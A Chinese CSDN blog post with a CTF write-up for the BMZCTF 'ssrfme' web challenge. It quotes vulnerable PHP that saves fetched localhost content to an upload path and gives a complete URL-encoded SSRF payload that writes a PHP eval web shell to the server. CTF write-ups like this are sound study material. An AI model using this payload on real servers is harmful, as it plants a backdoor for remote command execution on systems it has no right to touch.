BMZCTF:ssrfme

于 2021-01-24 17:39:18 发布 747 收藏 1
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/113093507
版权 
http://bmzclub.cn/challenges#ssrfme

在这里插入图片描述

<?php
if(isset($_GET) && !empty($_GET)){
    $url = $_GET['file'];
    $path = "upload/".$_GET['path'];
    
}else{
    show_source(__FILE__);
    exit();
}

if(strpos($path,'..') > -1){
    die('This is a waf!');
}


if(strpos($url,'http://127.0.0.1/') === 0){
    file_put_contents($path, file_get_contents($url));
    echo "console.log($path update successed!)";
}else{
    echo "Hello.Geeker";
}

关键点在这里

file_put_contents($path, file_get_contents($url));
echo "console.log($path update successed!)";

file_put_contents()要写入的内容是file_get_contents($url)返回的内容
接下来看看如何构造才能使得file_get_contents返回带有shell的内容

?file=http://127.0.0.1/&path=<?php phpinfo();?>

在这里插入图片描述
查看源代码
在这里插入图片描述

echo "console.log($path update successed!)";

这段代码使得我们传入的path参数会被写入到页面中
那么就可以构造

http://127.0.0.1/?file=http://127.0.0.1/&path=<?php eval($_POST[cmd]);?>

这样file_get_contents($url)返回的内容里面就有我们想要写入的shell
将上面这段url编码一次,然后加上path变量传入的文件名即可构造完整的payload

?path=mochu.php&file=http%3a%2f%2f127.0.0.1%2f%3ffile%3dhttp%3a%2f%2f127.0.0.1%2f%26path%3d%3c%3fphp+eval(%24_POST%5bcmd%5d)%3b%3f%3e

在这里插入图片描述
访问http://www.bmzclub.cn:20351/upload/mochu.php即可
在这里插入图片描述

末初mochu7
关注
  • 3
    点赞
  • 1
    收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
BMZCTF-Web WriteUp
Crazy198410的博客
11-15 1067
Web 题 hctf_2018_warmup 打开后是一张图片。 查看源码发现source.php 访问,得到一串代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.
[HITCON 2017]SSRFme(perl脚本中get命令执行漏洞)
最新发布
记录学习,一起进步
01-28 481
[HITCON 2017]SSRFme(perl脚本中get命令执行漏洞)
i春秋CTF ssrfme (peal函数中get命令漏洞)命令执行 详细题解+原理 学习过程
AAAAAAAAAAAA66的博客
12-16 665
前几天刚做一道命令执行的题目累的够呛,这会刷题又碰见一道,所以做个总结,梳理一下自己学到的各方面知识。 题目 分析 <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
file_put_contents($path,$content,FILE_APPEND);
weixin_30764883的博客
11-22 160
1 file_put_contents($path,$content.PHP_EOL,FILE_APPEND); //追加写文件 转载于:https://www.cnblogs.com/shenaishiren/p/7878105.html
使用PHP获取当前url路径的函数以及服务器变量
12-19
PHP获取当前url路径的函数及服务器变量:代码:复制代码 代码如下:<?php$path = /usr/opt/../ect/abcd;echo $_SERVER[‘DOCUMENT_ROOT’].”<br>”;   //获得服务器文档根变量(取决于http.conf中的配置)echo $_SERVER[‘PHP_SELF’].”<br>”;  //获得执行该代码的文件的路径,与http.conf中的配置有关系。echo __FILE__.”<br>”;  //获得文件的文件系统绝对路径的变量echo dirname(__FILE__);  //获得文件所在的文件夹路径的函数echo rea
sycsec的一道审计题目
一个码农的笔记
10-31 2868
首先题目给出了源代码 <?php if(isset($_GET) && !empty($_GET)){ $url = $_GET['file']; $path = "upload/".$_GET['path']; }else{ show_source(__FILE__); exit(); } if(strpos($path,'..') > -1){
file_put_contents以及file_get_contents的用法与在使用过程中遇到的问题(PHP学习)
weixin_30341735的博客
08-17 126
对数据的操作最基本的是增删改查,file_put_contents以及file_get_contents是对文件里的数据进行存入与取出。 先上代码: <?php $str = 'hello world'; if(file_put_contents('01.txt',$str)){ echo '数据存入成功','<br />'; }else{ echo ...
Pwnhub-胖哈勃外传-第一集-Writeup
dengzhasong7076的博客
12-15 137
看源代码里面有这样的一个链接。 http://54.223.231.220/image.php?file=http://127.0.0.1:8888/test.png&path=logo.jpg 有点像第七届极客出的php is fun。 极客php is fun的源码: if (isset($_GET) && !empty($_GET)) { $url ...
ssrfme
o3Ev的博客
05-02 176
ssrfme 题目: 打开环境,得到: <?php if(isset($_GET) && !empty($_GET)){ $url = $_GET['file']; $path = "upload/".$_GET['path']; }else{ show_source(__FILE__); exit(); } if(strpos($path,'..') > -1){ die('This is a waf!'); } if(
php file_put_contents() 函数(转)
weixin_34221332的博客
07-19 57
Definition and Usage定义和用法 The file_put_contents() writes a string to a file.file_put_contents()函数的作用是:将一个字符串写入文件。 This function follows these rules when accessing a file:当访问一个文件是,函数必须遵循下面这些法则: If...
远程文件下载
weixin_30780221的博客
11-12 54
<?php echo httpcopy("http://www.bacysoft.cn/uc_server/data/avatar/000/00/00/02_avatar_middle.jpg"); function httpcopy($url, $file="", $timeout=60) { $file = empty($file) ? pathinfo($url,PATHINFO...
php路径中写变量,[记录]关于PHP中file_put_contents()的路径不能使用变量代替的解决 | 祭夜の咖啡馆...
weixin_39974882的博客
03-12 304
前言(发生来源)看到群友“老陈”发出冒泡商城的图片时,我想到能不能批量获取MRP应用,于是在一番抓包测试之后,脚本基本完成,但是,在使用file_put_contents() 保存文件的时候,遇到了问题。详情一开始之这么写的:// 存储MRP文件$filename = 'mrp/'.$filename;file_put_contents($filename, $fileContent);但是,出现...
【转】用 PHP 内置函数 file_put_contents 写入文件
weixin_30604651的博客
05-07 44
PHP 内置函数file_put_contents用于写入文件。 file_put_contents函数最简单的写法,可以只用两个参数,一个是文件路径,一个是要写入的内容,语法如下: file_put_contents(filepath,data) 如果文件不存在,file_put_contents函数会自动创建文件;如果文件已存在,原有文件被重写。 你可以利用file_pu...
linux下使用file_put_contents分析记录日志的使用易错点
疯狂草的博客
08-03 1280
file_put_contents($file_name,$str); 1:$file_name   路径要以绝对路径 根目录为起始  eg:   /data/2018_08_01/0/test.game_1523278870.txt 2:当前用户要有权限进行创建写入$file_name  其中改名函数 rename("/tmp/tmp_file.txt", "/home/user/login...
file_put_contents函数常用方法
fjnjxr的博客|PHP每周一贴
08-25 2373
1、file_put_contents (PHP 5, PHP 7) file_put_contents — 将一个字符串写入文件 int file_put_contents ( string $filename , mixed $data [, int $flags = 0 [, resource $context ]] ) 和依次调用 fopen()
file_put_contents的用法
tingliting的专栏
11-30 8618
PHP file_put_contents() 函数是一次性向文件写入字符串或追加字符串内容的最合适选择。 file_put_contents() file_put_contents() 函数用于把字符串写入文件,成功返回写入到文件内数据的字节数,失败则返回 FALSE。 语法: int file_put_contents ( string filename, string

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末初mochu7

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值